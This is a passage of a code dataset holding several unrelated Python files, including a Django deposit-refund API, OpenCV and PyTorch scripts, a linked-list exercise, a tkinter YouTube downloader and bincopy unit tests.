% (\n customer.nick_name, customer.mobile, order.get_state_display())\n return errors\n\n\n# 保证金支付退款验证\ndef check_pay_deposit_error(deposit_record):\n errors, prefix = [], '用户: %s [%s]' % (deposit_record.customer.nick_name,\n deposit_record.customer.mobile)\n if deposit_record.state != MemberDepositRecord.States.CONFIRMED:\n errors.append('%s 非确认状态不允许付款' % prefix)\n\n if deposit_record.mod_amount is not None and \\\n deposit_record.mod_amount > deposit_record.amount:\n errors.append('%s 扣款金额大于违章预缴金金额' % prefix)\n\n if deposit_record.grade_type == DepositGrades.LEVEL1 and \\\n MemberDepositRecord.objects.curr_up(state=MemberDepositRecord.States.CONFIRMED,\n customer=deposit_record.customer).exists():\n errors.append('%s 有两笔退款待付记录,请先操作%s的退款确认' % (prefix, to_cent(settings.UPGRADE_DEPOSIT)))\n\n return errors\n\n\ndef _confirm_return_deposit(op_user, deposit_records, validated_data):\n deposit_records.update(\n pay_type=validated_data['pay_type'],\n return_pay_time=int(datetime.now().timestamp()),\n state=MemberDepositRecord.States.FINISH_RETURN,\n mod_desc=validated_data.get('mod_desc'),\n return_op_user_id=op_user.id,\n return_op_source=1,\n is_curr=0,\n last_operator=op_user)\n\n\nclass PayDeposit(generics.GenericAPIView):\n \"\"\"\n 付款操作 member_deposit_return_pay\n 参数 return_pay_type,mod_desc\n \"\"\"\n serializer_class = DepositRecordVASerializer\n permission_classes = (CanReturnDeposit, )\n\n def post(self, request, id_):\n serializer = self.serializer_class(data=request.data)\n serializer.is_valid(raise_exception=True)\n deposit_record = get_object_or_404(MemberDepositRecord, pk=id_)\n\n errors = check_pay_deposit_error(deposit_record)\n if errors:\n return Response(errors[0], status.HTTP_412_PRECONDITION_FAILED)\n\n deposit_records = MemberDepositRecord.objects.filter(id=deposit_record.id)\n _confirm_return_deposit(request.user, deposit_records, serializer.validated_data)\n return Response('success')\n\n\nclass CancelConfirmReturnDeposit(generics.GenericAPIView):\n \"\"\"\n 取消已经确认退还违章预缴金申请的操作\n \"\"\"\n serializer_class = DepositRecordVASerializer\n\n @transaction.atomic\n def post(self, request, id_):\n deposit_record = get_object_or_404(MemberDepositRecord, pk=id_)\n if deposit_record.state != MemberDepositRecord.States.CONFIRMED:\n return Response('非确认状态不允许取消确认', status.HTTP_412_PRECONDITION_FAILED)\n else:\n deposit_record.state = MemberDepositRecord.States.APPLY_RETURN\n deposit_record.save()\n return Response('success')\n\n\nclass BatchPayDeposit(generics.GenericAPIView):\n \"\"\"违章预缴金,批量付款\"\"\"\n serializer_class = BatchPayDepositRecordSerializer\n permission_classes = (CanConfirmDeposit, )\n\n def post(self, request):\n serializer = self.serializer_class(data=request.data)\n serializer.is_valid(raise_exception=True)\n deposit_records = serializer.validated_data['ids']\n for deposit_record in deposit_records:\n errors = check_pay_deposit_error(deposit_record)\n if errors:\n return Response(errors[0], status.HTTP_412_PRECONDITION_FAILED)\n\n for d in deposit_records:\n d.pay_type = serializer.validated_data['pay_type']\n d.return_pay_time = int(datetime.now().timestamp())\n d.state = MemberDepositRecord.States.FINISH_RETURN\n d.mod_desc = serializer.validated_data.get('mod_desc')\n d.return_op_user_id = request.user.id\n d.return_op_source = 1\n d.is_curr = 0\n d.last_operator = request.user\n d.save()\n\n return Response('success')\n\n\nclass CurrentCarOrderList(APIView):\n def get(self, request):\n parking_fee_id = self.request.query_params.get('parking_fee_id')\n parking_fee 
= get_object_or_404(ParkingFee, pk=parking_fee_id)\n car = parking_fee.order.car\n order_ids = list(Order.objects.filter(car=car).order_by('-id').values_list('id', flat=True))\n index = order_ids.index(parking_fee.order.id) + 1\n limit = int(self.request.query_params.get('limit', 20))\n data = {\n 'car_id': car.id,\n 'limit': limit,\n 'page': index // limit + 1,\n 'index': index % limit\n }\n return Response(data)\n","sub_path":"simplegit/zerocar-master/deposit/rest/apis.py","file_name":"apis.py","file_ext":"py","file_size_in_byte":25165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"67029143","text":"#coding=utf-8\n\nimport cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n#仿射变换\n# 原图中所有的平行线在结果图像中同样平行。为了创建这\n# 个矩阵我们需要从原图像中找到三个点以及他们在输出图像中的位置。\nimg = cv2.imread('D:\\\\DevN\\\\sample-data\\\\images\\\\football\\\\messi5.jpg',3)\nrows,cols,ch = img.shape\n#\n# 在仿射变换中,原图中所有的平行线在结果图像中同样平行。为了创建这\n# 个矩阵我们需要从原图像中找到三个点以及他们在输出图像中的位置。然后\n# cv2.getAffineTransform 会创建一个2x3 的矩阵,最后这个矩阵会被传给\n# 函数cv2.warpAffine。\n\n# pts1 = np.float32([[50,50],[200,50],[50,200]])\n# pts2 = np.float32([[10,100],[200,50],[100,250]])\n#\n# M = cv2.getAffineTransform(pts1,pts2)\n#\n# dst = cv2.warpAffine(img,M,(cols,rows))\n\n########################################\n# 对于视角变换,我们需要一个3x3 变换矩阵.\n# 在变换前后直线还是直线。\n# 要构建这个变换矩阵,你需要在输入图像上找4 个点,以及他们在输出图\n# 像上对应的位置。这四个点中的任意三个都不能共线。这个变换矩阵可以有\n# 函数cv2.getPerspectiveTransform() 构建。然后把这个矩阵传给函数\n# cv2.warpPerspective\n\npts1 = np.float32([[56,65],[368,52],[28,387],[389,390]])\npts2 = np.float32([[0,0],[300,0],[0,300],[300,300]])\nM=cv2.getPerspectiveTransform(pts1,pts2)\ndst=cv2.warpPerspective(img,M,(300,300))\n\nplt.subplot(121),plt.imshow(img),plt.title('Input')\nplt.subplot(122),plt.imshow(dst),plt.title('Output')\nplt.show()","sub_path":"core.framework.datamining.pyscript/openvc2/image-rotation-draw.py","file_name":"image-rotation-draw.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"420104971","text":"#!/usr/bin/python3\n\"\"\"Defines a singly linked list\"\"\"\n\n\nclass Node():\n \"\"\"Class that defines a node\"\"\"\n\n def __init__(self, data, next_node=None):\n \"\"\"Method for initialize a Node object.\n Args:\n data(int): Integer to insert inside the store inside node.\n next_node(Atributte): Atributte that store a Node object.\n Returns:\n Always nothing.\n \"\"\"\n self.data = data\n self.next_node = next_node\n\n @property\n def data(self):\n \"\"\"Getter of data.\n Args:\n Any Arguments.\n Returns:\n The current value of data.\n \"\"\"\n return self.__data\n\n @data.setter\n def data(self, value):\n \"\"\"Setter of data.\n Args:\n value(int): Integer store inside node.\n Return:\n Always nothing.\n \"\"\"\n if isinstance(value, int) is not True:\n raise TypeError('data must be an integer')\n else:\n self.__data = value\n\n @property\n def next_node(self):\n \"\"\"Getter of next_node.\n Args:\n Any Arguments.\n Returns:\n The current value of data.\n \"\"\"\n return self.__next_node\n\n @next_node.setter\n def next_node(self, value):\n \"\"\"Setter of next_node.\n Args:\n value(atributte): Atributte that store a Node object.\n Return:\n Always nothing.\n \"\"\"\n if type(value) is not Node and value is not None:\n raise TypeError('next_node must be a Node object')\n self.__next_node = value\n\n\nclass SinglyLinkedList():\n \"\"\"Class that defines a singly linked list\"\"\"\n\n def __init__(self):\n 
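# Illustrative sketch, separate from the record above: the OpenCV snippet
# builds a 3x3 perspective matrix from four point pairs; the same calls work
# on any array, so a synthetic image replaces the file path here.
import cv2
import numpy as np

img = np.zeros((400, 400, 3), dtype=np.uint8)  # synthetic stand-in image
pts1 = np.float32([[56, 65], [368, 52], [28, 387], [389, 390]])
pts2 = np.float32([[0, 0], [300, 0], [0, 300], [300, 300]])
M = cv2.getPerspectiveTransform(pts1, pts2)
dst = cv2.warpPerspective(img, M, (300, 300))
print(M.shape, dst.shape)  # (3, 3) (300, 300, 3)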
\"\"\"Method for initialize a single list object with head.\n Args:\n Any arguments.\n Returns:\n Always nothing.\n \"\"\"\n self.__head = None\n\n def sorted_insert(self, value):\n \"\"\"Method to manage a insert new node into the list.\n Args:\n value(data): Integer to store inside node.\n Returns:\n Always nothing.\n \"\"\"\n new_node = Node(value, None)\n tmp = self.__head\n if self.__head is None:\n self.__head = new_node\n elif value <= self.__head.data:\n new_node.next_node = self.__head\n self.__head = new_node\n else:\n while tmp.next_node and value > tmp.next_node.data:\n tmp = tmp.next_node\n new_node.next_node = tmp.next_node\n tmp.next_node = new_node\n\n def __str__(self):\n \"\"\"Method to print Square instance.\n Args:\n No Arguments\n Return:\n \"\"\"\n node_data = \"\"\n if self.__head is None:\n return \"\"\n else:\n tmp = self.__head\n while tmp is not None:\n node_data += str(tmp.data) + \"\\n\"\n tmp = tmp.next_node\n return node_data[:-1]\n","sub_path":"0x06-python-classes/100-singly_linked_list.py","file_name":"100-singly_linked_list.py","file_ext":"py","file_size_in_byte":2966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"217654527","text":"import numpy as np\nimport pandas as pd\n\n# original line - from sol import utils\n# I changed it to\nimport util\n# todo change back?\nimport vis\nfrom scipy.sparse.csgraph import minimum_spanning_tree\n\n########## add code ##########\nfrom itertools import combinations, permutations\nfrom scipy.sparse import csr_matrix\nfrom scipy.sparse.csgraph import minimum_spanning_tree\nfrom collections import Counter, defaultdict\n##############################\n\n\nnp.set_printoptions(precision=4)\npd.set_option('precision', 2)\n\n\ndef get_probs(image_to_labels):\n is_in_prob, both_in_prob = defaultdict(int), defaultdict(int)\n num_samples = len(image_to_labels)\n class_id2ind = dict()\n num_classes = 0\n for labels in image_to_labels.values():\n for label in labels:\n if label not in class_id2ind:\n class_id2ind[label] = num_classes\n num_classes += 1\n is_in_prob[class_id2ind[label]] += 1 / num_samples\n for l1, l2 in combinations(labels, 2):\n ind1 = min(class_id2ind[l1], class_id2ind[l2])\n ind2 = max(class_id2ind[l1], class_id2ind[l2])\n both_in_prob[(ind1, ind2)] += 1 / num_samples\n\n one_in_one_out_prob = defaultdict(int)\n both_out_prob = defaultdict(int)\n for ind1, ind2 in both_in_prob: # todo is this correct?\n one_in_one_out_prob[(ind1, ind2)] = is_in_prob[ind1] - both_in_prob[(ind1, ind2)]\n one_in_one_out_prob[(ind2, ind1)] = is_in_prob[ind2] - both_in_prob[(ind1, ind2)]\n both_out_prob[(ind1, ind2)] = 1 - (is_in_prob[ind1] + is_in_prob[ind2] - both_in_prob[(ind1, ind2)])\n\n return is_in_prob, both_out_prob, one_in_one_out_prob, both_in_prob, class_id2ind\n\n\ndef get_single_mutual_info(mutual, s1, s2):\n if mutual == 0:\n return 0\n return mutual * np.log(mutual / (s1 * s2))\n\n\ndef get_minus_mutual_info(is_in_prob, both_out_prob, one_in_one_out_prob, both_in_prob, class_id2ind):\n num_classes = len(is_in_prob)\n mutual_info = np.zeros((len(class_id2ind), len(class_id2ind)))\n for ind1, ind2 in both_in_prob: # todo is this correct?\n c_00 = get_single_mutual_info(both_out_prob[(ind1, ind2)], 1 - is_in_prob[ind1], 1 - is_in_prob[ind2])\n c_10 = get_single_mutual_info(one_in_one_out_prob[(ind1, ind2)], is_in_prob[ind1], 1 - is_in_prob[ind2])\n c_01 = get_single_mutual_info(one_in_one_out_prob[(ind2, ind1)], is_in_prob[ind2], 1 - is_in_prob[ind1])\n c_11 = 
get_single_mutual_info(both_in_prob[(ind1, ind2)], is_in_prob[ind1], is_in_prob[ind2])\n summ = c_00 + c_01 + c_10 + c_11\n mutual_info[ind1, ind2] = - summ\n return mutual_info\n\ndef main():\n vocabolary_threshold = 400\n oid_data = 'data/annotations-machine.csv'\n classes_fn = 'data/class-descriptions.csv'\n\n # Mapping between class lable and class name\n classes_display_name = util.load_display_names(classes_fn)\n\n #####################\n # ADD YOUR CODE HERE#\n #####################\n annotations = pd.read_csv(oid_data)\n image_to_labels = defaultdict(list)\n for _, row in annotations.iterrows():\n image_to_labels[row['ImageID']].append(row['LabelName'])\n\n # get Pd\n is_in_prob, both_out_prob, one_in_one_out_prob, both_in_prob, class_id2ind = get_probs(image_to_labels)\n\n # get mutual info for edges\n minus_mutual_info = get_minus_mutual_info(is_in_prob, both_out_prob, one_in_one_out_prob, both_in_prob, class_id2ind)\n\n # get spanning tree\n X = csr_matrix(minus_mutual_info)\n Tcsr = minimum_spanning_tree(X).toarray()\n ####################\n\n # Dictionary with mapping between each Node and its childern nodes.\n # use for each node the class lable\n # was before change - chow_liu_tree = dict()\n ################## change ###############\n length = Tcsr.shape[0]\n ind2class_id = {v: k for k, v in class_id2ind.items()}\n chow_liu_tree = {}\n for i, j in permutations(range(length), 2):\n if Tcsr[i, j] >= 0:\n continue\n parent = ind2class_id[i]\n child = ind2class_id[j]\n if parent not in chow_liu_tree:\n chow_liu_tree[parent] = []\n if child not in chow_liu_tree:\n chow_liu_tree[child] = []\n chow_liu_tree[parent].append(child)\n chow_liu_tree[child].append(parent)\n vis.plot_network(chow_liu_tree, classes_display_name)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"hw3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"586249553","text":"#!/usr/bin/env python3\n\nimport os\nimport json\n\nif __name__ == \"__main__\":\n\tfp = open(\"indexer-config.json\", \"r\")\n\tindexer_config = json.load(fp)\n\tfp.close()\n\n\tnotebooks = {\"notebooks\":[]}\n\tfor notebook_name in indexer_config[\"indexed_categories\"]:\n\t\tnotebook = {\"notebook_name\": notebook_name, \"categories\": []}\n\t\tcategories = os.listdir(notebook_name)\n\t\tcategories.sort()\n\t\tfor category_name in categories:\n\t\t\tcategory = {\"category_name\": category_name, \"notes\": []}\n\t\t\tnotes = os.listdir(notebook_name + \"/\" + category_name)\n\t\t\tnotes.sort()\n\t\t\tfor note_name in notes:\n\t\t\t\tcategory[\"notes\"].append(note_name)\n\t\t\tnotebook[\"categories\"].append(category)\n\t\tnotebooks[\"notebooks\"].append(notebook)\n\t\tcurrent_path = \"\"\n\n\tindexer_out = json.dumps(notebooks, ensure_ascii=False)\n\tfp = open(\"indexed.json\", \"w\")\n\tfp.write(indexer_out)\n\tfp.close()\n","sub_path":"blog_indexer.py","file_name":"blog_indexer.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"455404380","text":"R = []\nf = open(\"input.txt\",\"r\")\nT = int(f.readline())\nfor k in range(T):\n s = str(f.readline().strip())\n n = len(s)\n i = 0\n r = 0\n while i < n and s[i] == '-':\n i += 1\n if i > 0:\n r += 1\n while i < n:\n while i < n and s[i] == '+':\n i += 1\n j = i\n while i < n and s[i] == \"-\":\n i += 1\n if j < i:\n r += 2\n R = R + [r]\n \nf.close()\nf = 
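# Illustrative sketch, separate from the record above: the Chow-Liu
# construction negates mutual information before calling
# minimum_spanning_tree, since SciPy offers no maximum variant; a 3-node
# example with made-up weights.
import numpy as np
from scipy.sparse import csr_matrix
from scipy.sparse.csgraph import minimum_spanning_tree

mi = np.array([
    [0.0, 0.9, 0.1],
    [0.0, 0.0, 0.8],
    [0.0, 0.0, 0.0],
])  # pairwise mutual information, upper triangle

mst = minimum_spanning_tree(csr_matrix(-mi)).toarray()
edges = [(i, j) for i in range(3) for j in range(3) if mst[i, j] != 0]
print(edges)  # the two strongest edges survive: [(0, 1), (1, 2)]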
open(\"output.txt\",\"w\")\nfor k in range(T):\n f.write(\"Case #\"+str(k+1)+\": \"+str(R[k])+\"\\n\")\nf.close()\n","sub_path":"codes/CodeJamCrawler/16_0_2_neat/16_0_2_noelnadal_16QRB.py","file_name":"16_0_2_noelnadal_16QRB.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"368513701","text":"import torch\nfrom nets.yolo4_tiny import YoloBody\nimport numpy as np\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\ntorch_model = torch.load(\"traffic.pt\",map_location=device) # pytorch模型加载\ntorch_model2 = torch.load(\"../logs/Epoch100-Total_Loss5.2986-Val_Loss8.4492.pth\",map_location=device) # pytorch模型加载\n\nprint(\"module_list_len:\",len(torch_model['model']))\nprint(\"module_list2_len:\",len(torch_model2))\nnew_state_dict = {}\nfor layer_name,layer_name2 in zip(torch_model['model'],torch_model2):\n print(layer_name,np.shape(torch_model['model'][layer_name]),\"\\t\",layer_name2,np.shape(torch_model2[layer_name2]))\n new_state_dict[layer_name2]=torch_model['model'][layer_name]\n\n# print(\"--\"*100)\nmodel = YoloBody(3,1).eval()\nprint(model)\nmodel.load_state_dict(new_state_dict)\n\n# print(model.backbone.conv1.conv.weight,type(model.backbone.conv1.conv.weight))\n\n# batch_size = 1 #批处理大小\n# input_shape = (3, 416, 416) #输入数据,改成自己的输入shape\n\n# #set the model to inference mode\n# model.eval()\n\n# x = torch.randn(batch_size, *input_shape)\t# 生成张量\n# export_onnx_file = \"../model_data/yolov4_tiny_weights_coco2.onnx\"\t\t\t# 目的ONNX文件名\n# torch.onnx.export(model,\n# x,\n# export_onnx_file,\n# opset_version=11,\n# do_constant_folding=True,\t# 是否执行常量折叠优化\n# input_names=[\"input\"],\t# 输入名\n# output_names=[\"output\"],\t# 输出名\n# dynamic_axes={\"input\":{0:\"batch_size\"}, # 批处理变量\n# \"output\":{0:\"batch_size\"}})","sub_path":"ONNX_file/test01.py","file_name":"test01.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"39663765","text":"import pyne\nfrom xdress.typesystem import TypeSystem\n\npackage = 'bright'\nsourcedir = 'cpp'\npackagedir = 'bright'\n\nincludes = [pyne.includes]\n\nextra_types = 'pyne.extra_types' # non-default value\nmake_extra_types = False\n\nstlcontainers = []\nmake_stlcontainers = False\nstlcontainers_module = 'pyne.stlcontainers'\n\nclasses = [\n # classname, source filename[, bindings filename]\n ('FCComp', 'fccomp'),\n ('EnrichmentParameters', 'enrichment_parameters'),\n ('Enrichment', 'bright_enrichment', 'enrichment'),\n ('Reprocess', 'reprocess'),\n ('decay_nuc', 'storage'),\n ('from_nuc_struct', 'storage', None),\n ('Storage', 'storage'),\n ('FluencePoint', 'fluence_point'),\n ('ReactorParameters', 'reactor_parameters'),\n ('Reactor1G', 'reactor1g'),\n ('LightWaterReactor1G', 'light_water_reactor1g'),\n ('FastReactor1G', 'fast_reactor1g'),\n ('FuelFabrication', 'fuel_fabrication'),\n ('ReactorMG', 'reactormg'),\n ]\n\nfunctions = []\n\nts = TypeSystem.empty()\n\n# hack in some material registrations\nts.register_class('Material', \n cython_c_type='cpp_material.Material', cython_cimport=('pyne', 'cpp_material'),\n cython_cy_type='material._Material', cython_py_type='material.Material', \n cython_template_class_name='Material', cython_cyimport=('pyne', 'material'),\n cython_pyimport=('pyne', 'material'), \n cython_c2py=('{pytype}({var})',\n ('{proxy_name} = {pytype}()\\n'\n '{proxy_name}.mat_pointer[0] = {var}'),\n ('if {cache_name} is None:\\n'\n ' 
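# Illustrative sketch, separate from the record above: the weight-conversion
# script rebuilds a state dict by zipping two checkpoints' keys in order,
# which silently assumes both define layers in the same sequence; a toy
# version with plain tensors instead of real checkpoints.
import torch

old_state = {"module_list.0.conv.weight": torch.zeros(3, 3)}
new_keys = ["backbone.conv1.conv.weight"]

new_state = {nk: old_state[ok] for ok, nk in zip(old_state, new_keys)}
print(list(new_state))  # ['backbone.conv1.conv.weight']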
{proxy_name} = {pytype}(free_mat=False)\\n'\n ' {proxy_name}.mat_pointer = &{var}\\n'\n ' {cache_name} = {proxy_name}\\n')),\n cython_py2c=(\n '{proxy_name} = {pytype}({var}, free_mat=not isinstance({var}, {cytype}))',\n '{proxy_name}.mat_pointer[0]'),\n )\n\n#ts.register_specialization(('map', 'str', ('Material', '*'), 0),\n# cython_c_type='material._MapStrMaterial',\n# cython_cy_type='material._MapStrMaterial',\n# cython_py_type='material.MapStrMaterial',\n# cython_cimport=(('pyne', 'material'),),\n# cython_cyimport=(('pyne', 'material'),),\n# cython_pyimport=(('pyne', 'material'),),\n# )\n","sub_path":"xdressrc.py","file_name":"xdressrc.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"251221787","text":"import clase as cl\nimport curso as cr\nimport profesor as pr\nimport os\nimport django\n\nos.environ['DJANGO_SETTINGS_MODULE'] = 'viperEAFIT.settings'\ndjango.setup()\n\nfrom schedules.models import Schedule\nfrom academics.models import Class, Course\n\n\nclass Escuela:\n def __init__(self, name, max_score=0):\n self.max_score = max_score\n self.name = name\n self.clases = {cla:cla.id for cla in Class.objects.all()}\n self.cursos = {course:course.id for course in Course.objects.all()}\n null_prof = pr.Profesor(\"nocand\")\n null_prof.set_var(\"nocand\", -1000)\n self.profs = {\"nocand\": null_prof}\n\n\n def print_info(self):\n print(\"there are\", len(self.cursos), \"courses\")\n print(\"there are\", len(self.clases), \"clases\")\n print(\"there are\", len(self.profs), \"profs\")\n avg_avail = 0\n avg_occ = 0\n avg_max = 0\n for prof in self.profs.values():\n avg_avail += prof.get_horario().count_avail()\n avg_occ += prof.get_horario().get_total_h()\n avg_max += prof.get_mhor()\n\n\n print(\"avg avail is\", avg_avail/len(self.profs))\n print(\"avg occupied is\", avg_occ/len(self.profs))\n print(\"avg max is\", avg_max/len(self.profs))\n\n cands = [len(x.get_cands()) for x in self.clases.values()]\n print(\"avg num of cands is\", sum(cands)/len(cands), \"\\n\")\n\n \n def get_profs(self):\n return self.profs\n\n\n def get_prof(self, profid):\n val = self.profs.get(profid)\n if val == None:\n print(profid)\n print(self.profs)\n return val\n\n\n def add_prof(self, prof):\n self.profs[prof.get_id()] = prof\n\n\n def get_clases(self):\n return self.clases\n\n\n def get_clase(self, claseid):\n return self.clases.get(claseid)\n\n\n def add_clase(self, clase):\n self.clases[clase.get_id()] = clase\n\n\n def get_cursos(self):\n return self.cursos\n\n\n def get_curso(self, cursoid):\n return self.cursos.get(cursoid)\n\n\n def add_curso(self, curso):\n self.cursos[curso.get_id()] = curso\n \n\n# esc = Escuela('Escuelita')\n# print(esc.clases)\n# print(esc.cursos)","sub_path":"escuela.py","file_name":"escuela.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"431177455","text":"import tkinter as tk\nfrom tkinter import ttk\nfrom tkinter import messagebox\nfrom tkinter import filedialog\nimport re\nimport pafy # https://github.com/mps-youtube/pafy\nimport os\nfrom pprint import pprint\nimport threading\n\nDESKTOP_FOLDER = os.path.join(os.path.expanduser('~'), 'Desktop') # Should work on Mac, Windows & Linux\n\nclass YoutubeDownloaderApp():\n def __init__(self, parent):\n # Create the window\n self.window = parent\n self.window.geometry(\"450x300\")\n self.window.title(\"Youtube Downloader\")\n 
self.video = True\n self.downloading = False\n\n self.question_label = tk.Label(self.window, text=\"Youtube URL of video to download\")\n self.question_label.place(x=20, y=20)\n\n self.url_entry = tk.Entry(self.window)\n self.url_entry.place(x=20, y=60, w=300)\n self.url_entry.focus()\n\n self.question2_label = tk.Label(self.window, text=\"Save to folder\")\n self.question2_label.place(x=20, y=100)\n\n self.target_folder_entry = tk.Entry(self.window)\n self.target_folder_entry.place(x=20,y=140, w=300)\n self.target_folder_entry.delete(0, tk.END)\n self.target_folder_entry.insert(tk.END, DESKTOP_FOLDER)\n self.pick_folder_button = tk.Button(self.window, text=\"Select folder\", command=self.get_folder)\n self.pick_folder_button.place(x=350, y=140)\n\n self.get_video_button = tk.Button(self.window, text=\"Start download\", command=self.start_download)\n self.get_video_button.place(x=200, y=190)\n self.mode_button = tk.Button(self.window, text=\"Switch to M4A (audio) mode\", command=self.switch_mode)\n self.mode_button.place(x=20, y=190)\n self.close_button = tk.Button(self.window, text=\"Close\", command=self.window.quit)\n self.close_button.place(x=350, y=190)\n\n self.progress=ttk.Progressbar(self.window,orient=tk.HORIZONTAL,length=100,mode='determinate')\n self.progress.place(x=20, y=230)\n self.info = tk.Label(self.window, text=\"\")\n self.info.place(x=20,y=270)\n\n def switch_mode(self):\n self.video = not self.video\n if self.video:\n self.mode_button.configure(text=\"Switch to M4A (audio) mode\")\n else:\n self.mode_button.configure(text=\"Switch to MP4 (video) mode\")\n\n def start_download(self):\n url = self.url_entry.get()\n folder = self.target_folder_entry.get()\n if not self.downloading:\n threading.Thread(target=self.download_youtube).start()\n \n def get_folder(self):\n folder = filedialog.askdirectory(initialdir=DESKTOP_FOLDER, title = \"Select folder to save to\")\n self.target_folder_entry.delete(0, tk.END)\n self.target_folder_entry.insert(tk.END, folder)\n\n def _clean_file_name( self, original ):\n # Strip non-filename-friendly characters from the filename\n regex = re.compile('[^a-zA-Z0-9 \\-.]')\n return regex.sub(\"\", original )\n\n def download_youtube(self):\n self.downloading = True\n mode = \"video\" if self.video else \"audio\"\n url = self.url_entry.get()\n folder = self.target_folder_entry.get()\n video = pafy.new(url, ydl_opts={'nocheckcertificate': True, \"--no-check-certificate\": True})\n if mode == \"video\":\n best = video.getbestvideo(preftype=\"mp4\")\n else:\n best = video.getbestaudio(preftype=\"m4a\")\n saveAs = self._clean_file_name(video.title+\".\"+best.extension)\n saveAs = os.path.join(folder, saveAs)\n best.download(quiet=True, filepath=saveAs, callback=self.update_status)\n messagebox.showinfo(\"Done\", f\"Video \\n{url}\\n saved to\\n{saveAs}\")\n self.downloading = False\n return saveAs\n\n\n def update_status(self, stream, downloaded, ratio, rate, eta):\n percent = int(ratio*100)\n self.progress['value'] = percent\n mb = 1024*1024\n info_str = f\"{downloaded//mb} of {stream//mb} MB downloaded. 
{int(eta)} seconds remaining.\"\n self.info.configure(text=info_str)\n pass\n\nif __name__ == \"__main__\":\n root = tk.Tk()\n app = YoutubeDownloaderApp(root)\n root.mainloop()\n\n\n# https://www.youtube.com/watch?v=Ug5IOh6PxWQ","sub_path":"youtube-downloader.py","file_name":"youtube-downloader.py","file_ext":"py","file_size_in_byte":4205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"223009134","text":"import gzip\r\nimport json\r\nimport leveldb\r\n\r\n\r\ndef main():\r\n db = leveldb.LevelDB('knock60') # dbを指定、なかったら自動で作成\r\n with gzip.open('artist.json.gz', \"rt\", \"utf_8\") as f:\r\n for line in f:\r\n json_data = json.loads(line) # jsonデータを辞書型に変換\r\n name = f\"{json_data['name']}_{json_data['id']}\" # nameが同じ場合があるためidを付ける\r\n if 'area' in json_data:\r\n area = json_data['area']\r\n else:\r\n area = ''\r\n\r\n # str.encode()で文字列からバイト列に変換\r\n db.Put(name.encode(), area.encode())\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n","sub_path":"hwichan/chapter07/knock60.py","file_name":"knock60.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"346035739","text":"from __future__ import print_function\n\nimport unittest\nimport bincopy\n\nclass BinCopyTest(unittest.TestCase):\n\n def test_srec(self):\n binfile = bincopy.BinFile()\n with open('tests/files/in.s19', 'r') as fin:\n binfile.add_srec(fin.read())\n with open('tests/files/in.s19') as fin:\n self.assertEqual(binfile.as_srec(28, 16), fin.read())\n\n binfile = bincopy.BinFile()\n with open('tests/files/empty_main.s19', 'r') as fin:\n binfile.add_srec(fin.read())\n with open('tests/files/empty_main.bin', 'rb') as fin:\n self.assertEqual(binfile.as_binary(padding=b'\\x00'), fin.read())\n\n binfile = bincopy.BinFile()\n binfile.add_srec_file('tests/files/empty_main_rearranged.s19')\n with open('tests/files/empty_main.bin', 'rb') as fin:\n self.assertEqual(binfile.as_binary(padding=b'\\x00'), fin.read())\n\n try:\n binfile.add_srec_file('tests/files/bad_crc.s19')\n self.fail()\n except bincopy.Error as e:\n print(e)\n\n def test_ihex(self):\n binfile = bincopy.BinFile()\n with open('tests/files/in.hex', 'r') as fin:\n binfile.add_ihex(fin.read())\n with open('tests/files/in.hex') as fin:\n self.assertEqual(binfile.as_ihex(), fin.read())\n\n binfile = bincopy.BinFile()\n binfile.add_ihex_file('tests/files/in.hex')\n with open('tests/files/in.hex') as fin:\n self.assertEqual(binfile.as_ihex(), fin.read())\n\n def test_binary(self):\n # Add data to 0..2.\n binfile = bincopy.BinFile()\n with open('tests/files/binary1.bin', 'rb') as fin:\n binfile.add_binary(fin.read())\n with open('tests/files/binary1.bin', 'rb') as fin:\n self.assertEqual(binfile.as_binary(), fin.read())\n\n # Add data to 15..179.\n binfile = bincopy.BinFile()\n binfile.add_binary_file('tests/files/binary2.bin', 15)\n try:\n # cannot add overlapping segments\n with open('tests/files/binary2.bin', 'rb') as fin:\n binfile.add_binary(fin.read(), 20)\n self.fail()\n except bincopy.Error as err:\n print(err)\n # exclude the overlapping part and add\n binfile.exclude(20, 1024)\n with open('tests/files/binary2.bin', 'rb') as fin:\n binfile.add_binary(fin.read(), 20)\n with open('tests/files/binary3.bin', 'rb') as fin:\n self.assertEqual(binfile.as_binary(minimum_address=0,\n padding=b'\\x00'), fin.read())\n\n def test_array(self):\n binfile = bincopy.BinFile()\n with open('tests/files/in.hex', 'r') as fin:\n 
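# Illustrative sketch, separate from the record above: the downloader runs
# pafy's download in a worker thread so tkinter's mainloop stays responsive;
# the essential pattern, with a sleep standing in for the network work. Note
# that touching tkinter widgets directly from a worker thread (as the progress
# callback above does) is generally not thread-safe; polling a queue via
# after() is the usual safe route.
import threading
import time

def slow_task():
    time.sleep(1)  # stand-in for the actual download
    print("worker done")

threading.Thread(target=slow_task, daemon=True).start()
print("main thread stays free")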
